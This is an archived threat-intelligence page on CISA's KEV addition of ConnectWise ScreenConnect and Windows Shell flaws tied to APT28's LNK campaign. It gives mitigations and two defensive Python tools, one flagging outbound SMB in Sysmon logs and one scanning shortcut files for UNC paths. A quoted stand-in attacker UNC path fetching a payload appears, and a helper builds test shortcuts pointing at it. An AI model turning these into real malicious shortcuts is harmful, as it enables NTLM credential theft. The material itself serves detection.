INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
CISA Adds Actively Exploited ConnectWise ScreenConnect and Windows Shell Flaws to KEV
2026-04-29 08:46 | Severity: CRITICAL / HIGH
Executive Summary (AI-generated)
On April 28, 2026, CISA added two actively exploited flaws to its Known Exploited Vulnerabilities (KEV) catalog: CVE-2024-1708 (CVSS 8.4), a path traversal vulnerability in ConnectWise ScreenConnect 23.9.7 and earlier that attackers have chained with the critical authentication bypass CVE-2024-1709 (CVSS 10.0, in KEV since February 22, 2024), and CVE-2026-32202 (CVSS 4.3), a protection mechanism failure in Windows Shell that allows an unauthorized attacker to perform spoofing over a network. Microsoft has not disclosed the nature of the attacks on CVE-2026-32202, but Akamai said the flaw stems from an incomplete patch for CVE-2026-21510, which the Russian state-sponsored group APT28 exploited as a zero-day alongside CVE-2026-21513 in attacks on Ukraine and E.U. countries since December 2025. That campaign delivers a malicious Windows Shortcut (LNK) file whose UNC path makes Windows Shell connect to an attacker-controlled SMB server; the February 2026 patch stopped the resulting code execution but still let the victim machine authenticate to the attacker's server with no user interaction, leaking its Net-NTLMv2 hash for relay or offline cracking. Federal Civilian Executive Branch agencies must remediate both KEV entries by May 12, 2026.
Technical Mitigations (AI-generated)
* Patch ConnectWise ScreenConnect: CVE-2024-1708 and CVE-2024-1709 affect on-premises ScreenConnect 23.9.7 and earlier and were fixed in February 2024 (23.9.8 and later carry the fix). Internet-exposed instances are the priority; if an instance ran an affected version while exposed, treat it as potentially compromised and review it for unexpected administrator accounts and extensions rather than only patching.
* Patch Windows: CVE-2026-32202 is a follow-up to the February 2026 fixes for CVE-2026-21510 and CVE-2026-21513, so confirm the April 2026 update that addresses it is installed, not just the February update. A host with only the February patch will still resolve an attacker's UNC path and authenticate to it.
* Block the outbound SMB connection the exploit relies on: deny outbound TCP 445 (and 139) from workstations to the internet at both the perimeter and host firewall, and set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to audit and then deny, with exceptions only for known file servers. This removes the credential-leak path even on unpatched hosts.
* Harden against relay and cracking of any leaked Net-NTLMv2 hashes: require SMB signing and LDAP signing/channel binding, enable Extended Protection for Authentication on IIS and AD CS endpoints, and enforce long passwords so captured hashes resist offline cracking. These controls do not stop the leak, but they neutralise what the attacker can do with it.
* Authentication for ScreenConnect: multi-factor authentication remains worthwhile for ScreenConnect accounts, but it is not a mitigation for CVE-2024-1709, which bypasses authentication entirely; patching is. As an interim control where patching is delayed, block requests to the SetupWizard.aspx path on instances whose setup is already complete, since the bypass abuses that endpoint.
* Monitor network traffic and logs: alert on outbound SMB connections to hosts outside your file-server ranges, on LNK files arriving by e-mail or download that reference UNC paths, and on ScreenConnect web server logs showing requests to SetupWizard.aspx or newly created administrator users. Review the period since December 2025 for these indicators, not just the period since the KEV addition.
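The detection bullet above is the one most teams can act on immediately, because the attack's observable side effect is a workstation opening an SMB connection to an untrusted host. The following is an added example written for this page (not tooling from Akamai, Microsoft, CISA or the articles cited here): a small filter over Sysmon Event ID 3 (network connection) records exported as JSON lines that raises an alert for every outbound connection to TCP 445/139 whose destination is outside the trusted networks. The sample records are constructed in-code with Sysmon's field names; the 203.0.113.0/24 documentation range stands in for an attacker server, and the `trusted_networks` helper and its defaults are this example's own assumptions, to be replaced with your real file-server ranges.

```python
"""Flag outbound SMB connections to untrusted hosts in Sysmon-style network events."""
import ipaddress
import json

SMB_PORTS = {445, 139}

# Ranges where SMB traffic is expected (loopback, link-local, RFC 1918, ULA).
# Assumption for this example: real deployments add their file-server ranges.
DEFAULT_TRUSTED = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "169.254.0.0/16", "10.0.0.0/8", "172.16.0.0/12",
    "192.168.0.0/16", "::1/128", "fe80::/10", "fc00::/7",
)]


def trusted_networks(extra=()):
    """Default trusted ranges plus any extra CIDR strings the caller supplies."""
    return DEFAULT_TRUSTED + [ipaddress.ip_network(n) for n in extra]


def is_trusted(ip_text, trusted):
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # an unparsable destination is never trusted
    return any(ip in net for net in trusted)


def find_outbound_smb(lines, trusted=DEFAULT_TRUSTED):
    """Return one alert per Sysmon EventID 3 record that is an outbound
    connection to an SMB port on a host outside the trusted networks."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed line: skip rather than stop the pipeline
        # Sysmon exports carry Initiated as a bool or the string "true".
        if ev.get("EventID") != 3 or str(ev.get("Initiated", "")).lower() != "true":
            continue
        try:
            port = int(ev.get("DestinationPort", 0))
        except (TypeError, ValueError):
            continue
        if port not in SMB_PORTS:
            continue
        dst = str(ev.get("DestinationIp", ""))
        if is_trusted(dst, trusted):
            continue
        alerts.append({
            "time": ev.get("UtcTime"),
            "host": ev.get("Computer"),
            "image": ev.get("Image"),
            "dst": dst,
            "port": port,
            "reason": "outbound SMB to untrusted host; possible forced NTLM authentication",
        })
    return alerts


# Constructed sample records (not real telemetry). Only the first one should fire:
# the second goes to an internal server, the third is HTTPS, the fourth is inbound,
# the fifth is a file-create event and the last line is not JSON.
SAMPLE_EVENTS = [
    '{"EventID": 3, "UtcTime": "2026-04-20 09:12:01.113", "Computer": "WS01", "Image": "System", "Initiated": true, "DestinationIp": "203.0.113.10", "DestinationPort": 445}',
    '{"EventID": 3, "UtcTime": "2026-04-20 09:12:02.004", "Computer": "WS01", "Image": "System", "Initiated": true, "DestinationIp": "10.20.30.40", "DestinationPort": 445}',
    '{"EventID": 3, "UtcTime": "2026-04-20 09:12:03.550", "Computer": "WS01", "Image": "C:\\\\Windows\\\\explorer.exe", "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": "443"}',
    '{"EventID": 3, "UtcTime": "2026-04-20 09:12:04.000", "Computer": "WS02", "Image": "System", "Initiated": false, "DestinationIp": "203.0.113.10", "DestinationPort": 445}',
    '{"EventID": 11, "UtcTime": "2026-04-20 09:11:58.000", "Computer": "WS01", "Image": "C:\\\\Windows\\\\explorer.exe", "TargetFilename": "C:\\\\Users\\\\a\\\\Downloads\\\\invoice.lnk"}',
    'not json at all',
]

if __name__ == "__main__":
    for alert in find_outbound_smb(SAMPLE_EVENTS):
        print(alert)
```

Note that the connecting image for the SMB redirector is normally `System`, not the application that triggered the path resolution, so the rule keys on port and destination rather than on process name; the LNK write by explorer.exe seconds earlier is the kind of context worth joining to the alert in a SIEM.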
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
APT28
CVE-2024-1708
CVE-2024-1709
CVE-2026-21510
CVE-2026-21513
CVE-2026-32202
Target & Sectors
Source region: RU (Russian Federation)
Target regions: UA (Ukraine), E.U. member states
Incident Timeline
February 2024
ConnectWise fixed CVE-2024-1708 (CVSS score: 8.4), a path traversal vulnerability affecting ScreenConnect versions 23.9.7 and earlier, and CVE-2024-1709 (CVSS score: 10.0), a critical authentication bypass. Attacks exploiting CVE-2024-1708 have been chained with CVE-2024-1709 by multiple threat actors over the years.
February 22, 2024
CISA added CVE-2024-1709 to the KEV catalog.
December 2025
APT28 (aka Fancy Bear, Forest Blizzard, GruesomeLarch, and Pawn Storm), a Russian nation-state group, began a campaign targeting Ukraine and E.U. countries that uses a malicious Windows Shortcut (LNK) file to exploit CVE-2026-21510 and CVE-2026-21513, both zero-days at the time, bypassing Microsoft Defender SmartScreen and executing attacker-controlled code. According to Akamai's Dahan, APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library (DLL) from a remote server using a UNC path such as '\\attacker.com\share\payload.cpl'; resolving that path makes Windows initiate an SMB connection to the attacker's server.
January 2026
Akamai unearthed a malicious artifact linking the abuse of CVE-2026-21513 to APT28.
February 2026
Microsoft patched CVE-2026-21510 and CVE-2026-21513 (both CVSS score: 8.8). Akamai said the February 2026 patch mitigated the remote code execution risk by triggering a SmartScreen check of the CPL file's digital signature and origin zone, but still allowed the victim machine to resolve the UNC path, initiate an SMB connection, authenticate to the attacker's server and automatically fetch the CPL file without user interaction. The SMB connection triggers an automatic NTLM authentication handshake that sends the victim's Net-NTLMv2 hash to the attacker, usable for NTLM relay attacks and offline cracking: a zero-click credential theft vector via auto-parsed LNK files.
March 2026
Akamai publicly flagged the abuse of CVE-2026-21513 and attributed it to APT28 on the basis of the artifact found in January 2026.
April 14, 2026
Microsoft published its advisory for CVE-2026-32202 (CVSS score: 4.3), a protection mechanism failure in Windows Shell that allows an unauthorized attacker to perform spoofing over a network. Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510. Microsoft has not disclosed the nature of the attacks weaponizing the flaw.
April 27, 2026
Microsoft revised the CVE-2026-32202 advisory to acknowledge active exploitation, saying it rectified the "Exploitability Index, Exploited flag, and CVSS vector" because they were incorrect when published on April 14.
April 28, 2026
CISA added CVE-2024-1708 and CVE-2026-32202 to the KEV catalog, a day after Microsoft's advisory update.
April 29, 2026
The Hacker News and Security Affairs reported on the KEV additions (see Source excerpts below).
Source excerpts
CISA Adds Actively Exploited ConnectWise and Windows Flaws to KEV
Ravie Lakshmanan, The Hacker News, Apr 29, 2026 (Vulnerability / Network Security)
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added two security flaws impacting ConnectWise ScreenConnect and Microsoft Windows to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. Below are the flaws added to the catalog:
* CVE-2024-1708 (CVSS score of 8.4) - ConnectWise ScreenConnect Path Traversal Vulnerability. A path traversal vulnerability affecting ConnectWise ScreenConnect versions 23.9.7 and earlier, fixed in February 2024. Attacks exploiting CVE-2024-1708 have been chained with CVE-2024-1709 (CVSS score: 10.0), a critical authentication bypass vulnerability, by multiple threat actors over the years. It's worth noting that CISA added CVE-2024-1709 to the KEV catalog on February 22, 2024.
* CVE-2026-32202 (CVSS score of 4.3) - Microsoft Windows Protection Mechanism Failure Vulnerability. The second flaw added to the catalog is a Windows Shell Spoofing vulnerability. "Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network," Microsoft noted in an alert.
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025. The campaign leverages a malicious Windows Shortcut (LNK) file to exploit the two vulnerabilities, effectively bypassing Microsoft Defender SmartScreen and enabling attacker-controlled code to be executed.
"APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library (DLL) from a remote server using a UNC path," Dahan explained. "When that path is a UNC path (like '\\attacker.com\share\payload.cpl'), Windows initiates an SMB connection to the attacker's server," Dahan said. "This server message block (SMB) connection triggers an automatic NTLM authentication handshake, sending the victim's Net-NTLMv2 hash to the attacker, which can later be used for NTLM relay attacks and offline cracking. This gap between path resolution and trust verification left a zero-click credential theft vector via auto-parsed LNK files."

U.S. CISA adds Microsoft Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog
Security Affairs, Apr 29, 2026
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities (KEV) catalog.

Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202
Ravie Lakshmanan, The Hacker News, Apr 28, 2026 (Vulnerability / Threat Intelligence)
Microsoft on Monday revised its advisory for a now-patched, high-severity security flaw impacting Windows Shell to acknowledge that it has been actively exploited in the wild. The flaw is a protection mechanism failure in Windows Shell that allows an unauthorized attacker to bypass a security feature over a network. On April 27, 2026, Microsoft said it rectified the "Exploitability Index, Exploited flag, and CVSS vector" as they were incorrect when they were published on April 14.
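The quote above describes a shortcut that carries a UNC path which Windows Shell resolves on its own, before any trust check. A practical place to catch that is at the file itself. The following is an added example written for this page (not Akamai's, Microsoft's or any vendor's code): it parses the shell link header and the StringData section according to the MS-SHLLINK layout (76-byte header, LinkCLSID check, LinkFlags deciding which fields follow), reports every UNC host referenced, and finishes with a raw sweep for UTF-16LE and ASCII `\\host\share` strings so references buried in the LinkInfo or IDList structures are not missed. The page does not say which LNK field APT28 populates, so the scanner checks all of them. The sample shortcuts are constructed in-code by `build_lnk` (a minimal header plus an ICON_LOCATION string, not a real-world sample); `attacker.com` is the host from Dahan's illustration, and `fileserver.corp.example` is an assumed internal host used to show the allowlist.

```python
"""Scan Windows shell link (.lnk) bytes for UNC references that would make
Windows Shell open an SMB connection to a remote host when the shortcut is parsed."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
# {00021401-0000-0000-C000-000000000046}, the ShellLink CLSID, in on-disk byte order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1) that govern the layout of the file body.
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

# StringData entries appear in this fixed order, each present only if its flag is set.
STRING_DATA_ORDER = [
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
]

UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9.-]*)(\\\S*)")
UNC_UTF16_RE = re.compile(rb"\\\x00\\\x00(?:[A-Za-z0-9.-]\x00)+\\\x00(?:[^\x00\s]\x00)*")
UNC_ASCII_RE = re.compile(rb"\\\\[A-Za-z0-9.-]+\\[^\x00\s]*")


def parse_string_data(data, flags):
    """Walk the StringData section and return {field_name: text}."""
    fields = {}
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (u16) + IDList
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (u32) includes itself
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    for name, bit in STRING_DATA_ORDER:          # each: CountCharacters (u16) + chars
        if not flags & bit:
            continue
        (count,) = struct.unpack_from("<H", data, pos)
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


def find_unc_targets(data, allow_hosts=()):
    """Return [{'field', 'host', 'unc'}] for every UNC reference not on the allowlist."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("too short to be a shell link")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a shell link (bad HeaderSize or LinkCLSID)")
    allow = {h.lower() for h in allow_hosts}
    hits, seen = [], set()

    def record(field, text):
        for m in UNC_RE.finditer(text):
            host = m.group(1).lower()
            key = (host, m.group(0))
            if host in allow or key in seen:
                continue
            seen.add(key)
            hits.append({"field": field, "host": host, "unc": m.group(0)})

    try:
        for field, value in parse_string_data(data, flags).items():
            record(field, value)
    except struct.error:
        pass  # truncated StringData: fall through to the raw sweep
    # Raw sweep catches UNC strings inside LinkInfo, the IDList or ExtraData blocks.
    for m in UNC_UTF16_RE.finditer(data):
        record("raw", m.group(0).decode("utf-16-le", errors="ignore"))
    for m in UNC_ASCII_RE.finditer(data):
        record("raw", m.group(0).decode("ascii", errors="ignore"))
    return hits


def build_lnk(icon_location, unicode=True):
    """Constructed minimal shell link for testing: header + ICON_LOCATION only."""
    flags = HAS_ICON_LOCATION | (IS_UNICODE if unicode else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x80,        # FileAttributes = FILE_ATTRIBUTE_NORMAL
                         0, 0, 0,     # Creation/Access/Write time
                         0, 0, 1,     # FileSize, IconIndex, ShowCommand = SW_SHOWNORMAL
                         0, 0, 0, 0)  # HotKey, Reserved1, Reserved2, Reserved3
    text = icon_location.encode("utf-16-le" if unicode else "cp1252")
    return header + struct.pack("<H", len(icon_location)) + text


if __name__ == "__main__":
    suspicious = build_lnk(r"\\attacker.com\share\payload.cpl")
    print(find_unc_targets(suspicious))
    print(find_unc_targets(build_lnk(r"%SystemRoot%\system32\shell32.dll")))
```

Run it over a mail gateway's quarantined attachments or a user's Downloads folder and treat any hit whose host is not a known file server as a candidate for the forced-authentication pattern described above; the allowlist exists because legitimate shortcuts to internal shares are common and would otherwise drown the signal.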
May 12, 2026
Remediation deadline: Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary fixes by May 12, 2026, to secure their networks.
Intelligence Sources
The Hacker News, 2026-04-29
Security Affairs, 2026-04-29
The Hacker News, 2026-04-28
Incident Version History: last updated 2026-05-01T12:01